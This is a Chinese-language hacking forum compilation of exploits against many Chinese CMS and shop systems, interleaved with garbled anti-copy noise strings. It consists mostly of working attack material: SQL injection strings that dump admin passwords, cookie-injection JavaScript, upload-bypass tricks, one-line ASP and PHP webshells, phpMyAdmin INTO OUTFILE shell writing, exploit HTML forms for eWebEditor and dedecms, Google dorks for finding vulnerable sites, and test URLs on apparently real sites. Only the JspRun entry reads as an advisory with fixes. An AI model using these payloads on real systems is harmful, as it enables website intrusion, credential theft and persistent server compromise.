启航企业建站系统 cookie注入漏洞通杀所有版本
$ d" e" I: s: G: J' Q% k2 D d" @/ d, t( J q: f
直接上exploit:
( m4 F6 j" n) k& |javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
( G" d6 l) z8 m4 Z) k' Ctest:http://www.tb11.net/system/xitong/shownews.asp?id=210
2 e, ? Y. [+ Y) X--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ n& s/ _. |/ a* o4 UAsprain论坛 注册用户 上传图片就可拿到webshell
; [8 _# p% t ?0 [
6 z* b, F4 Z6 {7 j gAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。 Y2 L" R% T' H. I
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
8 Y" e% D8 G4 s+ \+ `4 M% ^ U7 }2.gif 为一小图片文件,一定要小,比如qq表情图片1 M ], Z8 R9 ^
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
7 @1 a: k7 ~* {* u b6 l% u. ?) a4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了8 x' m7 s. `. A) i* e
5.q.asp;.gif% a/ N( E) G5 _* J5 ]
google:Powered by Asprain0 ?% x2 N. g! ~( {0 }' E
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; o& n/ ~0 K2 X, H+ \, R P% l* P
ShopNum1全部系统存在上传漏洞。
& z$ h8 u* |) x8 R0 \0 r: J: B9 N% |
& L: B ~+ L. _" k6 ]首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。$ Y5 n, i& e( w) a/ d
按说明 提示登录后台。。+ q, Z, R2 Q6 j' _
在后台功能页面->附件管理->附件列表: W% ?9 i O5 W; k8 h( ~
可以直接上传.aspx 后缀木马: ], Z/ { M) x2 l( }, m5 l
http://demo.shopnum1.com/upload/20110720083822500.aspx, l/ d6 T) |, s% U
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( T$ L- e! W& A: T
8 _$ `( k( i p- f- F7 D9 q牛牛CMS中小企业网站管理系统 上传漏洞) g& W- u1 r' a% _* `2 y' b4 I
! q8 _- l: x" z8 I
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
2 t9 Q& f/ n8 n$ {3 e R& A3 G后台:admin/login.asp
0 z( C$ _* i! {5 a. c& b. s4 m- tewebeditor 5.5 Nday
7 T/ g) d8 Z$ h1 `- c0 e+ Zexp:, n9 Z* G8 a9 L- |! a( Y
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
- v/ D+ J9 ^$ N. u2 x<input?type=file?name=uploadfile?size=100><br><br>?$ E$ O0 ?9 U. X% S% y
<input?type=submit?value=upload>?
* }, [/ Y2 z5 f, }+ I% C2 ?</form>
5 P: H! b3 e! |ps:先上传小马.
5 r( u9 T& ]: ]inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏1 S5 ~, K* }3 V3 k
9 g9 [1 I% e ^
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------" ?" y0 o7 ~, e9 _ B, @! p
1 d# w0 Q3 V# S6 i* ~- t$ u. JYothCMS 遍历目录漏洞
: l' i, f9 J! u4 Q1 c; H+ q6 B/ t: T* S0 \6 A6 b
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。, s9 S# r* m5 P2 W: Y
默认后台:admin/login.asp0 Z# x r! {: x5 p2 g
遍历目录:
* U) B. O% s" e$ }ewebeditor/manage/upload.asp?id=1&dir=../1 X B$ | }6 I
data:
$ ]/ q8 e5 D) }3 u' m* Whttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa/ l: V( ], e- C' | m. j" |
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* c6 h4 ]) _4 Z. W9 @4 \2 @; K4 ~6 {3 L! O
Net112企业建站系统 1.00 I: m, q* w3 K N1 G/ b$ w( I
+ [- H* U7 X+ S: K源码简介:; j0 i0 H" r" A
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。 r4 E$ d5 l. U2 I+ A( \, H7 s, s; k
添加管理员:
% E0 O; w( e1 C& D* G( v/ Ghttp://www.0855.tv/admin/admin.asp?action=add&level=2 d' U+ w4 k: V' B
其实加不加都不是很重要,后台文件都没怎么作验证。2 H0 Z3 o& u8 [ Q7 I6 I. M
上传路径:
r" \7 W" |1 |* R) Yhttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=2007 S0 i8 g+ B1 A: X
http://www.0855.tv/inc/Upfile.asp?Stype=2
1 ^2 c- ?% N8 Y& |' A. L3 X! j6 S怎么利用自己研究。
1 q4 C8 @- L& `+ l遍历目录:
# _; |3 B$ m$ Qhttp://www.0855.tv/admin/upfile.asp?path=../..+ i6 h$ D* i8 b0 ]$ z$ W# W
如:0 ~/ B9 K! f+ E) n% [, c
http://www.0855.tv/admin/upfile.asp?path=../admin7 P' S* u. n# T v
http://www.0855.tv/admin/upfile.asp?path=../data
/ q! @8 z- p: l+ ?3 e1 i--------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 h* R- c0 p9 p+ H5 b& M3 F# {) ^2 B
! O5 Z: x7 B2 ]7 t
易和阳光购物商城通杀 上传漏洞; H5 }: S T0 ^" C& i+ V9 [6 |
* r2 K7 ?3 C$ s4 g" ~
前提要求是IIS6.0+asp坏境。2 ?, C4 x# N$ W8 ?. a T, S: d: C
漏洞文件Iheeo_upfile.asp ! h0 e3 v/ ~' T* A0 J% v4 V# d
过滤不严.直接可以iis6.0上传+ ], M& b# I* X$ z! V! o
把ASP木马改成0855.asp;1.gif
S, D$ l3 ~7 ^, i" Q直接放到明小子上传
) ~3 T1 F) k) c' ~5 gGoogle搜索:inurl:product.asp?Iheeoid=
3 x/ j; K5 ~; i8 l--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 R. O% w. [8 I# B4 [$ m5 a, u1 ~9 @! N( f* ~( o
phpmyadmin后台4种拿shell方法
4 m) c' C6 E6 b1 H" Q1 b9 F! o4 A C$ I9 |- N( _, A2 \
方法一:
2 |; m+ P) d: F+ M( E# ]% iCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
, M1 ?; D' ^* L2 eINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');+ p8 ?9 G! `6 Q& u% H# a
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';5 `+ P1 ]% o" a' z" C/ j) k+ g
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
8 l, n/ O( G/ b! r" X- m% `一句话连接密码:xiaoma" P$ {$ ?, W# l( F
方法二:% _7 }/ f f3 o/ k. v
Create TABLE xiaoma (xiaoma1 text NOT NULL);# Y& A2 e$ k+ ?" y8 {
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');8 ~8 G! C" y1 S! F* b
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php'; Z6 R0 w$ R; {8 \
Drop TABLE IF EXISTS xiaoma;9 l( A, }( [0 h9 f. H& }
方法三:% a5 c7 ~& D4 e1 E2 E& Q- k$ r
读取文件内容: select load_file('E:/xamp/www/s.php');" z K1 v, M6 n" l3 G
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php' S2 z* m7 Q! \7 D7 Y) F
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
5 l6 H0 Z# u/ O1 s+ b方法四:
# {9 f. y0 s3 H/ E8 [9 kselect load_file('E:/xamp/www/xiaoma.php');
5 Z$ S; q, D6 j& ]select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
$ X0 m: D0 Z8 _' Q8 T# e然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir8 K6 k! I' ^2 t5 u2 c
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 S6 K6 S, U) Z- I7 y$ u0 d
+ v" A6 ~3 _& t7 P o传信网络独立开发网站源码0day漏洞
/ E5 p" [$ O* b+ F0 d4 ~8 n6 B5 V3 i5 n8 y. f
后台system/login.asp
7 [) ]. H$ p" A& F7 R进了后台有个ewebeditor3 p5 V$ ], [: l) O0 x: s* J$ \
Google 搜索inurl:product1.asp?tyc=
1 V7 }6 B8 |! I0 b/ ?+ i( c# p编辑器漏洞默认后台ubbcode/admin_login.asp" h; f; `' q ?. p7 Z) g& d
数据库ubbcode/db/ewebeditor.mdb0 u9 a! ?2 V: \2 f1 u
默认账号密码yzm 1111114 ^0 k3 [& G: Q) R2 C( l' e
! p) ]8 l, K) j7 ?8 A
拿webshell方法
6 ^; S. I( p. B8 F7 H5 j9 M登陆后台点击“样式管理”-选择新增样式 * F+ M) C0 h$ w
样式名称:scriptkiddies 随便写
a" A8 z( X0 I4 T0 b路径模式:选择绝对路径
( T0 D+ L# w! [- G( L图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx: a; f% P" o2 \, i5 H: ^
图片类型比如就是我们要上传的ASP木马格式$ E$ E0 a" |, P5 V( W- R3 e
上传路径:/
0 h: N! O% E2 u: y3 Z图片限制:写上1000 免的上不了我们的asp木马
8 r6 {7 U) J1 F9 d+ n( _上传内容不要写
* x9 f I7 Z1 W" M5 ?" U' d) ?可以提交了 ( s5 w% j7 U; B: m1 j2 Q4 F
样式增加成功!
7 a8 K7 X; b( `& b/ P4 l返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 1 w) I4 A) Z4 i: L1 h9 } V- D
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
6 R/ y* d8 y% c7 c: D$ P$ H5 }网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies$ G8 u- y# M; }& R
上ASP木马 回车 等到路径 y# |2 G6 _* T, N
. T: B1 M3 Q6 y% Z* t
后台:system/login.asp
$ a. [# E$ N+ p8 d. y7 k+ @Exp:
; Q9 N0 _( M0 G7 h/ Sand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
. b& v. y+ v- |" f& s2 W测试:
3 c$ b& S4 P; _% C5 y) Hhttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master& m4 v8 a7 \4 Z1 U+ e
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
8 {, R7 x1 Y1 R `--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( t8 Q4 [6 z0 H
1 N" h9 K: Z1 r9 q; }& B( k; Cfoosun 0day 最新注入漏洞/ s# V/ A6 N: x# X% L5 x
) L5 n. ]+ o. j7 k4 F# o: l
漏洞文件:www.xxx.com/user/SetNextOptions.asp: x) y# o4 F9 m4 `
利用简单的方法:
- U3 w6 A8 ]6 C. c/ C* n暴管理员帐号:) A; y! t2 i# y% k
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin( D6 S+ H0 j" j8 J2 i+ j
暴管理员密码:
5 K$ j5 e2 j! F4 Lhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,1 i2 L1 V, G* w# _' ~$ N
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- T/ \" |+ P4 n" ?) d
9 w; o8 B% `/ }/ j; i! T网站程序的版权未知!
3 F7 h6 B: n- k1 z& U
( Z, V0 N* Q, ], c& P默认网站数据库:- t- y |0 K" @+ o- D+ M3 V( [7 o
www.i0day.com/data/nxnews.mdb
. @/ ?. V7 X4 v: A$ R3 N- ?' s- gewebeditor 在线编辑器:
% U! e/ R8 O( a% p5 E9 W编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb4 C' Y' { e. D+ r
登录地址:ewebeditor/admin_login.asp
! R& I3 i5 f% {$ z6 h* c默认密码:admin admin$ R* [* W; K/ B+ B7 ^! A* ^
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
4 O6 o7 a8 }: L3 g3 [
6 j: s% v* Q9 N3 U8 g) [1 I& P( jSql注入漏洞:% Z/ M. V0 u& x/ O ?5 C
http://www.i0day.com/detail.asp?id=12
( e7 e5 e, E x5 |, n" o2 f. `3 nexp: e2 {4 s* Q' D9 a3 A
union select 1,admin,password,4,5,6,7,8 from admin# ]% v1 G0 G/ S( l/ L* q7 K
爆出明文帐号/密码3 y: {9 s5 k9 t. M5 w( P
4 l' Y! L( g; X- y; M0 B上传漏洞:9 O, U+ C# E- |2 c7 c k
后台+upfile.asp' O1 d8 y! ]6 Z9 X+ `" S' K# y
如:
" m* Z- r! E$ |/ C$ Dhttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。% X. Q; Y7 e: [! D l
shell的地址:网址+后台+成功上传的马
2 {- ?6 }* R1 n) K; L* Xgoogle:inurl:news.asp?lanmuName=+ I6 x5 C2 P* Y6 X
------------------------------------------------------------------------------------------------------------------------------------------------------------------------. ~( M- c& J' O; x6 D
6 |+ c$ d B, k( z, b" l1 F, K- Wdedecms最新0day利用不进后台直接拿WEBSHELL* m% I9 T* o# T4 g& O+ J
# q; d( m2 ^4 c
拿webshell的方法如下:3 { t% ^4 c2 e$ s j
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
( ~/ T0 B8 U7 q# c" j; f前题条件,必须准备好自己的dede数据库,然后插入数据:
$ D( {1 P# a7 x1 M0 n) E. \insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
. t2 a- }) ` C+ w
8 Y% n ?- h |" h再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
- ~3 _# l) [: y5 h! M+ e! o<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">: `! ]- V3 Q1 l3 g/ q
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
0 K1 O9 O- r; ~<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />- d5 O7 T8 x/ A$ f9 T# g
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />/ N# I& o8 b+ b4 s
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
9 r0 \ y2 D+ n<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />: {% E/ T9 f3 D
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
- v* L6 M" C1 p9 ]( c0 k6 s<input type="text" value="true" name="nocache" style="width:400">
9 I& N' h$ F! H, A: T' |! I4 O; j<input type="submit" value="提交" name="QuickSearchBtn"><br />
Q- b+ T A# w# e! t/ V+ f+ P</form>& I, V9 B# q) @2 L7 f0 x
<script>
+ x. Z: n; S) J- g. C, Kfunction addaction()
% F+ e0 x+ g3 T6 ?{, e+ b) C, m: X! H6 N; b
document.QuickSearch.action=document.QuickSearch.doaction.value;
& I5 g. T1 z( X' G}
# y8 r) n! j K! p3 f# Q</script>% v4 o4 J; x# y) e
-----------------------------------------------------------------------------------------------------------------------------------------------6 m+ F4 Z1 F$ x' f' j: b" m
* q8 T2 m$ M0 g' |
dedecms织梦暴最新严重0day漏洞
, N( ]1 e& t1 _. T4 e; k1 U% Gbug被利用步骤如下:
/ O* X& U2 m# q- xhttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
. ] f- y1 T! A把上面{}上的字母改为当前的验证码,即可直接进入网站后台。& b! O* j d# H# U* s+ g
-------------------------------------------------------------------------------------------------------------------------------------------
- I; t6 O1 d8 N5 q8 h$ ~7 A" k1 x( X8 J
多多淘宝客程序上传漏洞 3 l! z( d. J& x6 x
漏洞页面:" y% T3 r, s X8 j' \% f
admin\upload_pic.php5 [7 k, O4 E5 L: ~$ y6 ?3 `4 G
传送门:
8 C8 O$ z) D& R5 Y) ^9 k3 Hhttp://www.www.com/admin/upload_pic.php?uploadtext=slide1; |2 C) c( T4 F
PS:copy张图片马 直接 xxx.php 上传抓包地址!" x7 z0 m. x) g4 H. P* f. J
------------------------------------------------------------------------------------------------------------------------------------------------------7 v' \* }8 |* l4 n
, D1 }4 N5 _$ @! W
无忧公司系统ASP专业版后台上传漏洞# ^" A' R0 ?5 F/ `! p
漏洞文件 后台上传. c C1 N* m$ {2 J! S
admin/uploadPic.asp5 l1 g3 \5 H" k5 u$ Q. X
漏洞利用 这个漏洞好像是雷池的
! @9 m$ m( R$ O! l1 A" fhttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
' d; D/ Z9 J( W! e等到的webshell路径:1 W! ?- U+ X, G8 j/ z7 D
/UploadFiles/scriptkiddies.asp;_2.gif! H3 d5 P& H, \9 [
---------------------------------------------------------------------------------------------------------------------------------------------------
9 L- \, }% Q9 k* T2 z/ D+ P" D9 |3 Z; r; D" ] {# f
住哪酒店分销联盟系统2010; ?- {$ ]! z6 z* P) y& _" ^
Search:; R3 c0 G9 M. w: Z$ r
inurl:index.php?m=hotelinfo. E5 j. d: i4 s9 d7 d
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
5 y3 [8 ` T, ]默认后台:index.php?m=admin/login' ~6 [2 \) M% v0 O& P6 @' P" |
--------------------------------------------------------------------------------------------------------------------------------------------------2 p; y6 d! D1 o/ b
# J7 a: f9 z6 ^2 J7 }5 j
inurl:info_Print.asp?ArticleID=
6 v5 x6 t& _* ~% Q: I% [后台 ad_login.asp
6 y3 A+ W5 I! k( U爆管理员密码:; K( x; a" B5 e3 @4 C y3 a; u
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
* y5 n3 V( a' c2 v9 M------------------------------------------------------------------------------------------------------------------------------------------------------------
3 B8 j6 R0 @! z8 A( e
. B/ o1 [: M' C$ j7 y5 J4 W搜索框漏洞!
' k$ d+ p7 a3 W; M& I%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
. |) S, \0 F3 d5 y6 Q2 j S2 j--------------------------------------------------------------------------------------------------------------------------------------------------------
9 {4 ?0 @+ i- t. D3 K0 F, J
$ m2 {/ {( j- H1 X9 D* R, f" X关键字:
' l$ F. x6 O* K. ninurl:/reg_TemletSel.asp?step=2
5 R/ m! j. Y. `或者
6 x* q. J6 z. L3 O; R电子商务自助建站--您理想的助手3 k5 ~( d) i/ `, y
-------------------------------------------------------------------------------------------------------------------------------------------------
/ x: Q- C7 P2 g% J0 |) R
6 @2 K( [/ M- [. ]: WiGiveTest 2.1.0注入漏洞
) ^) {& M; S' Q9 JVersion: <= 2.1.08 P8 r* Q* O0 }! g7 F A- H
# Homepage: http://iGiveTest.com/
, H" K) M( X; k# R0 j: i; X谷歌关键字: “Powered by iGiveTest”+ x6 h) W, f# F
随便注册一个帐号。然后暴管理员帐号和密码
: d" [0 @2 k3 x& K) hhttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
/ x/ r& W# f+ F4 r9 v------------------------------------------------------------------------------------------------------------------------------------------------
9 a4 ^# |: V$ z& r
* O1 R) u1 Z; |& u0 u; c% p+ T YCKXP网上书店注入漏洞
; g2 g1 |( W3 }/ m0 K工具加表:shop_admin 加字段:admin3 S% p0 O" D$ W; ^5 Q0 J
后台:admin/login.asp ) L1 o3 ]& n9 V" T" @( H) a
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/( \0 d( i8 u9 R
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
$ R' ?+ z. X1 v7 o5 ]8 C$ j--------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 d, N9 Y6 z+ |! I/ c
0 W$ f, T5 T! u2 C/ M0 ]
段富超个人网站系统留言本写马漏洞, G4 K! e* W4 _7 i. C
源码下载:http://www.mycodes.net/24/2149.htm
( F$ y: H+ X0 M( l3 j7 P0 f. N+ taddgbook.asp 提交一句话。
; Y, R+ { T0 f% O8 `+ x4 Z2 s0 C连接: http://www.xxxx.tv/date/date3f.asp
& d. W v1 U* g6 W* i$ X' E1 C( `google:为防批量,特略!
# r# h- f& {* X+ i* \, J$ M. ^. j-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( n& I: V: N" _* y" \) x4 z
5 }# u" [1 o9 D k9 ^; }( M7 V6 e智有道专业旅游系统v1.0 注入及列目录漏洞& ^% f3 D! p# t' [
默认后台路径:/admin/login.asp$ k1 K9 ~9 Y) t$ e$ d
默认管理员:admin8 j" v4 z: J* t! b' _! J. a* p
默认密码:123456
. O$ k$ X# L% M" PSQL EXP Tset:
7 B- e) s/ i9 ~( Z# w; s2 v& ahttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
/ W; \5 W3 A& R. H' [! G------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 g1 b0 P0 ^" z d
' q1 w1 @) s1 M6 P( @ewebeditor(PHP) Ver 3.8 本任意文件上传0day. B$ T! y7 {1 |" I& Y8 P4 ~5 _1 I
EXP:4 `% Q' O' {: |; ~9 I j
<title>eWebeditoR3.8 for php任意文件上EXP</title>+ i8 h9 r- s* n
<form action="" method=post enctype="multip
9 h/ e/ A& R% d2 U F1 Vart/form-data">
+ \& u6 F5 \$ s( w* J<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> % x! c% v7 v( f. P
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
6 f" e$ n3 X$ w2 {; @<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
) ~: }. B) y& }) e2 y _3 P& n/ K& Xfile:<input type=file name="uploadfile"><br>
. B3 l: i# r3 p1 S. \5 X8 f0 r7 o, y<input type=button value=submit onclick=fsubmit()>
: q( S. s5 d% Y2 U0 r, A</form><br>
, v' b4 Z) j. n# `! M' O" } o- ?<script>
0 j' G7 x2 G* L4 s4 wfunction fsubmit(){
1 e! x' G) k+ Y5 p- Yform = document.forms[0]; - q2 b! v5 m2 `2 J
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
! ~& ~% I( k: W7 q) }& b o' Ualert(form.action);
, L# y( g' R6 `form.submit();
- K/ b0 U& r* z/ b7 Z} & T' G2 m/ h; p# ]5 h1 H6 Q3 k
</script>
+ {9 a3 K3 c" {4 z! ]) i8 j2 |7 Q4 c注意修改里面ewebeditor的名称还有路径。" y2 A( w- [( }: m' t. M9 O
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ |2 D3 }9 G& z$ Y6 v6 s. w. c! y9 O5 ~
提交’时提示ip被记录 防注入系统的利用
- {# x9 C" C' Q3 }/ f8 J" i网址:http://www.xxx.com/newslist.asp?id=122′( [4 e+ ~7 r5 M9 A' p& J+ e+ m
提示“你的操作已被记录!”等信息。( B6 j- g. O$ J& r! X0 |
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。, b4 i( f! |5 |9 f
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. S+ U T& X b7 N( O& ^3 H2 J! u9 I4 i
西部商务网站管理系统 批量拿shell-0day$ ^: a& q' |) f, v2 E. e5 {
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb + ~& F& p. z& A" g3 a T4 W1 u7 N+ f
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
( F- X7 l9 N+ L7 L: T9 k0 H2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
$ q# p& @' t. U+ k; k; G- b3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
0 b( ]" _& L* y2 n* V; }, D& }---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" D9 l- |! `: ?& K8 Y9 F* D, }; R% W5 V
JspRun!6.0 论坛管理后台注入漏洞% F, c2 G7 x( z4 k8 O- K5 V. ]
0 D1 a! e7 H& g# Y! ?, L2 e6 S% NSEBUG-ID:20787 发布时间:2011-04-30 影响版本:
& O7 z) n3 ?3 hJspRun!6.0 * t1 F2 S& h: U! f6 a* f
漏洞描述:9 M+ g, R; E, U
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。: y2 \$ g' a6 F7 ^# w1 [% h+ J
在处理后台提交的文件中ForumManageAction.java第1940行0 s; _' L, y9 c' }) V& J
String export = request.getParameter("export");//直接获取,没有安全过滤0 j, k w6 E% G/ [1 g* z
if(export!=null){
) j( Q; a# V7 P0 QList> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
" C# |/ G$ S* R3 Iif(styles==null||styles.size()==0){
- C# Z+ ?6 z. }* ~8 z<*参考
8 G! Z3 S% w5 l1 Y. n7 Cnuanfan@gmail.com
$ `$ _- z" ?& A, y. B*> SEBUG安全建议:1 h" }( @, f7 F) T) b& G, P* E
www.jsprun.net o6 s( V% T( x+ a Z
(1)安全过滤变量export
5 a4 q! |7 p1 e# i) E" F8 L- d(2)在查询语句中使用占位符, A- b$ U% K6 x) Z4 f/ _2 G% ~) K
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------& B- E/ o# j! s# I* i; c( U
5 ]9 [' [8 s* ?# X乌邦图企业网站系统 cookies 注入
6 }6 Y3 {* V) n7 ]; B0 a
' U) o, a; m! }- ~1 k程序完整登陆后台:/admin/login.asp
' I0 U# e6 y" W( H( s2 E默认登陆帐号:admin 密码:admin8881 X% Y% E" S- i+ s1 Q8 L+ S
语句:(前面加个空格)
/ p# Q, @# R# m# E0 m# jand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
+ i: V4 B" X+ g* K6 _9 P5 m/ J4 p或者是16个字段:* I+ B% c9 X6 k+ }: r5 l0 @
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
- G' c& R5 a0 G# H, `爆不出来自己猜字段。- T9 L: e( `7 v4 u
注入点:http://www.untnt.com/shownews.asp?=882 y: T; q# H7 E/ J3 L
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
9 G4 {$ o# Z9 I$ x6 x关键字:3 u# b* U3 V4 r7 a# h
inurl:shownews?asp.id=" y( ~1 F% j- {
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 u- Q, [6 E+ Z' M; @
$ N# V" P% W6 D% B6 F0 W+ ], TCKXP网上书店注入漏洞9 T. L k+ Q) }
$ {% S( j& A# q5 K
工具加表:shop_admin 加字段:admin* L9 p6 f! P$ k8 C: I* b
后台:admin/login.asp ; Q3 L0 U) M6 ~: c4 ~
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
: A' y O8 D. ]; S/ w1 }inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息# H( b; Y& s) G6 S% b' m0 Q5 v
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------" ^( G& @3 J. T+ N, U
: i. d! F3 V7 W1 U
YxShop易想购物商城4.7.1版本任意文件上传漏洞/ m/ [+ `2 y' c8 K3 P/ D" v' p
O: a! @$ a/ ~* l4 ~" U
http://xxoo.com/controls/fckedit ... aspx/connector.aspx
+ o6 t& T- z2 }' h- ~8 d T跳转到网站根目录上传任意文件。2 {8 r. q% Y$ V6 |
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
